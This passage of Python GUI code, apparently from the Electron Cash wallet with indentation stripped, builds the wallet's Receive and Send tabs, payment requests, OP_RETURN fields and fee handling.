'''tx_desc is set only for txs created in the Send tab'''
d = show_transaction(tx, self, tx_desc)
self._tx_dialogs.add(d)
def on_toggled_opreturn(self, b):
''' toggles opreturn-related widgets for both the receive and send
tabs'''
b = bool(b)
self.config.set_key('enable_opreturn', b)
# send tab
if not b:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
for x in self.send_tab_opreturn_widgets:
x.setVisible(b)
# receive tab
for x in self.receive_tab_opreturn_widgets:
x.setVisible(b)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton()
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
label = HelpLabel(_('&Receiving address'), msg)
label.setBuddy(self.receive_address_e)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.gui_object.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
# Cash Account for this address (if any)
msg = _("The Cash Account (if any) associated with this address. It doesn't get saved with the request, but it is shown here for your convenience.\n\nYou may use the Cash Accounts button to register a new Cash Account for this address.")
label = HelpLabel(_('Cash Accoun&t'), msg)
class CashAcctE(ButtonsLineEdit):
my_network_signal = pyqtSignal(str, object)
''' Inner class encapsulating the Cash Account edit.
Note:
- `slf` in this class is this instance.
- `self` is the wrapping class instance. '''
def __init__(slf, *args):
super().__init__(*args)
slf.font_default_size = slf.font().pointSize()
icon = ":icons/cashacct-button-darkmode.png" if ColorScheme.dark_scheme else ":icons/cashacct-logo.png"
slf.ca_but = slf.addButton(icon, self.register_new_cash_account, _("Register a new Cash Account for this address"))
slf.ca_copy_b = slf.addCopyButton()
slf.setReadOnly(True)
slf.info = None
slf.cleaned_up = False
self.network_signal.connect(slf.on_network_qt)
slf.my_network_signal.connect(slf.on_network_qt)
if self.wallet.network:
self.wallet.network.register_callback(slf.on_network, ['ca_updated_minimal_chash'])
def clean_up(slf):
slf.cleaned_up = True
try: self.network_signal.disconnect(slf.on_network_qt) # need to disconnect parent signals due to PyQt bugs, see #1531
except TypeError: pass
if self.wallet.network:
self.wallet.network.unregister_callback(slf.on_network)
def set_cash_acct(slf, info: cashacct.Info = None, minimal_chash = None):
if not info and self.receive_address:
minimal_chash = None
ca_list = self.wallet.cashacct.get_cashaccounts(domain=[self.receive_address])
ca_list.sort(key=lambda x: ((x.number or 0), str(x.collision_hash)))
info = self.wallet.cashacct.get_address_default(ca_list)
if info:
slf.ca_copy_b.setDisabled(False)
f = slf.font(); f.setItalic(False); f.setPointSize(slf.font_default_size); slf.setFont(f)
slf.setText(info.emoji + " " + self.wallet.cashacct.fmt_info(info, minimal_chash=minimal_chash))
else:
slf.setText(pgettext("Referencing CashAccount", "None"))
f = slf.font(); f.setItalic(True); f.setPointSize(slf.font_default_size-1); slf.setFont(f)
slf.ca_copy_b.setDisabled(True)
slf.info = info
def on_copy(slf):
''' overrides super class '''
QApplication.instance().clipboard().setText(slf.text()[3:] + ' ' + slf.text()[:1]) # cut off the leading emoji, and add it to the end
QToolTip.showText(QCursor.pos(), _("Cash Account copied to clipboard"), slf)
def on_network_qt(slf, event, args=None):
''' pick up cash account changes and update receive tab. Called
from GUI thread. '''
if not args or self.cleaned_up or slf.cleaned_up or args[0] != self.wallet.cashacct:
return
if event == 'ca_verified_tx' and self.receive_address and self.receive_address == args[1].address:
slf.set_cash_acct()
elif event == 'ca_updated_minimal_chash' and slf.info and slf.info.address == args[1].address:
slf.set_cash_acct()
def on_network(slf, event, *args):
if event == 'ca_updated_minimal_chash' and args[0] == self.wallet.cashacct:
slf.my_network_signal.emit(event, args)
def showEvent(slf, e):
super().showEvent(e)
if e.isAccepted():
slf.set_cash_acct()
self.cash_account_e = CashAcctE()
label.setBuddy(self.cash_account_e)
grid.addWidget(label, 1, 0)
grid.addWidget(self.cash_account_e, 1, 1, 1, -1)
self.receive_message_e = QLineEdit()
label = QLabel(_('&Description'))
label.setBuddy(self.receive_message_e)
grid.addWidget(label, 2, 0)
grid.addWidget(self.receive_message_e, 2, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
# OP_RETURN requests
self.receive_opreturn_e = QLineEdit()
msg = _("You may optionally append an OP_RETURN message to the payment URI and/or QR you generate.\n\nNote: Not all wallets yet support OP_RETURN parameters, so make sure the other party's wallet supports OP_RETURN URIs.")
self.receive_opreturn_label = label = HelpLabel(_('&OP_RETURN'), msg)
label.setBuddy(self.receive_opreturn_e)
self.receive_opreturn_rawhex_cb = QCheckBox(_('Raw &hex script'))
self.receive_opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
grid.addWidget(label, 3, 0)
grid.addWidget(self.receive_opreturn_e, 3, 1, 1, 3)
grid.addWidget(self.receive_opreturn_rawhex_cb, 3, 4, Qt.AlignLeft)
self.receive_opreturn_e.textChanged.connect(self.update_receive_qr)
self.receive_opreturn_rawhex_cb.clicked.connect(self.update_receive_qr)
self.receive_tab_opreturn_widgets = [
self.receive_opreturn_e,
self.receive_opreturn_rawhex_cb,
self.receive_opreturn_label,
]
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
label = QLabel(_('Requested &amount'))
label.setBuddy(self.receive_amount_e)
grid.addWidget(label, 4, 0)
grid.addWidget(self.receive_amount_e, 4, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 4, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([_(i[0]) for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
label = HelpLabel(_('Request &expires'), msg)
label.setBuddy(self.expires_combo)
grid.addWidget(label, 5, 0)
grid.addWidget(self.expires_combo, 5, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(True)
self.expires_label.hide()
grid.addWidget(self.expires_label, 5, 1)
self.save_request_button = QPushButton(_('&Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('&Clear'))
self.new_request_button.clicked.connect(self.new_payment_request)
weakSelf = Weak.ref(self)
class MyQRCodeWidget(QRCodeWidget):
def mouseReleaseEvent(slf, e):
''' to make the QRWidget clickable '''
weakSelf() and weakSelf().show_qr_window()
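# `weakSelf` (rather than capturing `self` directly) keeps the nested
# widget class from holding the window alive through a reference cycle.
# A minimal sketch of the same pattern (illustrative only):
#
#   weakSelf = Weak.ref(self)
#   def on_click():
#       window = weakSelf()   # resolves to None once the window is GC'd
#       if window:
#           window.show_qr_window()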
self.receive_qr = MyQRCodeWidget(fixedSize=200)
self.receive_qr.setCursor(QCursor(Qt.PointingHandCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
buttons.addStretch(1)
grid.addLayout(buttons, 6, 2, 1, -1)
self.receive_requests_label = QLabel(_('Re&quests'))
from .request_list import RequestList
self.request_list = RequestList(self)
self.request_list.chkVisible()
self.receive_requests_label.setBuddy(self.request_list)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
vbox2 = QVBoxLayout()
vbox2.setContentsMargins(0,0,0,0)
vbox2.setSpacing(4)
vbox2.addWidget(self.receive_qr, Qt.AlignHCenter|Qt.AlignTop)
self.receive_qr.setToolTip(_('Receive request QR code (click for details)'))
but = uribut = QPushButton(_('Copy &URI'))
def on_copy_uri():
if self.receive_qr.data:
uri = str(self.receive_qr.data)
self.copy_to_clipboard(uri, _('Receive request URI copied to clipboard'), uribut)
but.clicked.connect(on_copy_uri)
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
but.setToolTip(_('Click to copy the receive request URI to the clipboard'))
vbox2.addWidget(but)
vbox2.setAlignment(but, Qt.AlignHCenter|Qt.AlignVCenter)
hbox.addLayout(vbox2)
class ReceiveTab(QWidget):
def showEvent(slf, e):
super().showEvent(e)
if e.isAccepted():
wslf = weakSelf()
if wslf:
wslf.check_and_reset_receive_address_if_needed()
w = ReceiveTab()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.address_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
op_return = req.get('op_return')
op_return_raw = req.get('op_return_raw') if not op_return else None
URI = web.create_URI(addr, amount, message, op_return=op_return, op_return_raw=op_return_raw)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
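# Illustrative result of the above (address elided, values hypothetical):
#
#   bitcoincash:<addr>?amount=0.1&message=rent&time=1577836800&exp=3600
#
# 'name' and a base58-encoded 'sig' are appended only for signed requests.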
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e) or repr(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
return False
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
kwargs = {}
opr = self.receive_opreturn_e.text().strip()
if opr:
# save op_return, if any
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
kwargs[arg] = opr
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, **kwargs)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.request_list.select_item_by_address(req.get('address')) # when adding items to the view the current selection may not reflect what's in the UI. Make sure it's selected.
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self.top_level_window(), title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
try:
pr = paymentrequest.serialize_request(r).SerializeToString()
except ValueError as e:
''' User entered some large amount or other value that doesn't fit
into a C++ type. See #1738. '''
self.show_error(str(e))
return
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address(frozen_ok=False)
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
# New! Since the button is called 'Clear' now, we let them proceed with a re-used address
addr = self.wallet.get_receiving_address()
else:
# Warn if past gap limit.
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None) # We want the current item to always reflect what's in the UI. So if new, clear selection.
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_opreturn_rawhex_cb.setChecked(False)
self.receive_opreturn_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
self.cash_account_e.set_cash_acct()
@rate_limited(0.250, ts_after=True) # this function potentially re-computes the QR widget, so it's rate limited to once every 250ms
def check_and_reset_receive_address_if_needed(self):
''' Check to make sure the receive tab is kosher and doesn't contain
an already-used address. This should be called from the showEvent
for the tab. '''
if not self.wallet.use_change or self.cleaned_up:
# if they don't care about change addresses, they are ok
# with re-using addresses, so skip this check.
return
# ok, they care about anonymity, so make sure the receive address
# is always an unused address.
if (not self.receive_address # this should always be defined but check anyway
or self.receive_address in self.wallet.frozen_addresses # make sure it's not frozen
or (self.wallet.get_address_history(self.receive_address) # make a new address if it has a history
and not self.wallet.get_payment_request(self.receive_address, self.config))): # and if they aren't actively editing one in the request_list widget
addr = self.wallet.get_unused_address(frozen_ok=False) # try unused, not frozen
if addr is None:
if self.wallet.is_deterministic():
# create a new one if deterministic
addr = self.wallet.create_new_address(False)
else:
# otherwise give up and just re-use one.
addr = self.wallet.get_receiving_address()
self.receive_address = addr
self.update_receive_address_widget()
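# Note on @rate_limited above: repeated showEvent-driven calls collapse to
# at most one invocation per 250ms (ts_after=True presumably stamps the
# time after the call completes). Hypothetical usage sketch:
#
#   @rate_limited(1.0)
#   def refresh(self):
#       ...  # heavy UI recomputation, throttled to once per second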
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None)
self.set_receive_address(self.wallet.get_receiving_address(frozen_ok=False))
def show_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window()
self.qr_window.setAttribute(Qt.WA_DeleteOnClose, True)
weakSelf = Weak.ref(self)
def destroyed_clean(x):
if weakSelf():
weakSelf().qr_window = None
weakSelf().print_error("QR Window destroyed.")
self.qr_window.destroyed.connect(destroyed_clean)
self.update_receive_qr()
if self.qr_window.isMinimized():
self.qr_window.showNormal()
else:
self.qr_window.show()
self.qr_window.raise_()
self.qr_window.activateWindow()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.update_receive_address_widget()
def update_receive_qr(self):
if not self.receive_address:
return
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
kwargs = {}
if self.receive_opreturn_e.isVisible():
# set op_return if enabled
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
opret = self.receive_opreturn_e.text()
if opret:
kwargs[arg] = opret
# Special case hack -- see #1473. Omit bitcoincash: prefix from
# legacy address if no other params present in receive request.
if Address.FMT_UI == Address.FMT_LEGACY and not kwargs and not amount and not message:
uri = self.receive_address.to_ui_string()
else:
# Otherwise proceed as normal, prepending bitcoincash: to URI
uri = web.create_URI(self.receive_address, amount, message, **kwargs)
self.receive_qr.setData(uri)
if self.qr_window:
self.qr_window.set_content(self, self.receive_address_e.text(), amount,
message, uri, **kwargs)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
# NB: the translators hopefully will not have too tough a time with this
# *fingers crossed* :)
msg = "<span style=\"font-weight:400;\">" + _('Recipient of the funds.') + " " + \
_("You may enter:"
"<ul>"
"<li> Bitcoin Cash <b>Address</b> <b>★</b>"
"<li> Bitcoin Legacy <b>Address</b> <b>★</b>"
"<li> <b>Cash Account</b> <b>★</b> e.g. <i>satoshi#123</i>"
"<li> <b>Contact name</b> <b>★</b> from the Contacts tab"
"<li> <b>OpenAlias</b> e.g. <i>satoshi@domain.com</i>"
"</ul><br>"
" <b>★</b> = Supports <b>pay-to-many</b>, where"
" you may optionally enter multiple lines of the form:"
"</span><br><pre>"
" recipient1, amount1 \n"
" recipient2, amount2 \n"
" etc..."
"</pre>")
self.payto_label = payto_label = HelpLabel(_('Pay &to'), msg)
payto_label.setBuddy(self.payto_e)
qmark = ":icons/question-mark-dark.svg" if ColorScheme.dark_scheme else ":icons/question-mark-light.svg"
qmark_help_but = HelpButton(msg, button_text='', fixed_size=False, icon=QIcon(qmark), custom_parent=self)
self.payto_e.addWidget(qmark_help_but, index=0)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter(self.payto_e)
completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('&Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
description_label.setBuddy(self.message_e)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('&OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
self.opreturn_label.setBuddy(self.message_opreturn_e)
hbox = QHBoxLayout()
hbox.addWidget(self.message_opreturn_e)
self.opreturn_rawhex_cb = QCheckBox(_('&Raw hex script'))
self.opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
hbox.addWidget(self.opreturn_rawhex_cb)
grid.addLayout(hbox, 3, 1, 1, -1)
self.send_tab_opreturn_widgets = [
self.message_opreturn_e,
self.opreturn_rawhex_cb,
self.opreturn_label,
]
self.from_label = QLabel(_('&From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_label.setBuddy(self.from_list)
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('&Amount'), msg)
amount_label.setBuddy(self.amount_e)
grid.addWidget(amount_label, 5, 0)
grid.addWidget(self.amount_e, 5, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 5, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("&Max"), self.spend_max)
self.max_button.setFixedWidth(140)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 5, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 5, 4)
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('F&ee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_e_label.setBuddy(self.fee_slider)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 6, 0)
grid.addWidget(self.fee_slider, 6, 1)
grid.addWidget(self.fee_custom_lbl, 6, 1)
grid.addWidget(self.fee_e, 6, 2)
self.preview_button = EnterButton(_("&Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("&Send"), self.do_send)
self.clear_button = EnterButton(_("&Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 7, 1, 1, 3)
self.payto_e.textChanged.connect(self.update_buttons_on_seed) # hide/unhide various buttons
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
self.opreturn_rawhex_cb.stateChanged.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enabled = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enabled)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
extra = run_hook("not_enough_funds_extra", self)
if isinstance(extra, str) and extra:
text += " ({})".format(extra)
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be no longer than 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.opreturn_rawhex_cb.stateChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
self.invoice_list.chkVisible()
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
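# Arithmetic sketch for the above (illustrative): a stored custom rate of
# 1234 sat/kB becomes 1234 / 1000.0 = 1.234 sats/B, and
# round(1.234 * 100) / 100 -> 1.23, so the label reads "1.23 sats/B",
# i.e. the rate rounded to two decimal places.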
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
fee_rate = None
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
outputs.append(OPReturn.output_for_rawhex(opreturn_message))
else:
outputs.append(OPReturn.output_for_stringdata(opreturn_message))
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturn.TooLarge:
self.op_return_toolong = True
return
except OPReturn.Error as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.max_button.isChecked():
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, name):
item = self.from_list.currentItem()
if (item and item.data(0, Qt.UserRole) == name
and not item.data(0, Qt.UserRole+1) ):
i = self.from_list.indexOfTopLevelItem(item)
try:
self.pay_from.pop(i)
except IndexError:
# The list may contain items not in the pay_from if added by a
# plugin using the spendable_coin_filter hook
pass
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
if not item:
return
menu = QMenu()
name = item.data(0, Qt.UserRole)
action = menu.addAction(_("Remove"), lambda: self.from_list_delete(name))
if item.data(0, Qt.UserRole+1):
action.setText(_("Not Removable"))
action.setDisabled(True)
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self, *, spendable=None):
''' Optional kwarg spendable indicates *which* of the UTXOs in the
self.pay_from list are actually spendable. If this arg is specified,
coins in the self.pay_from list that aren't also in the 'spendable' list
will be grayed out in the UI, to indicate that they will not be used.
Otherwise all coins will be non-gray (default).
(Added for CashShuffle 02/23/2019) '''
sel = self.from_list.currentItem() and self.from_list.currentItem().data(0, Qt.UserRole)
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def name(x):
return "{}:{}".format(x['prevout_hash'], x['prevout_n'])
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
def new(item, is_unremovable=False):
ret = QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])
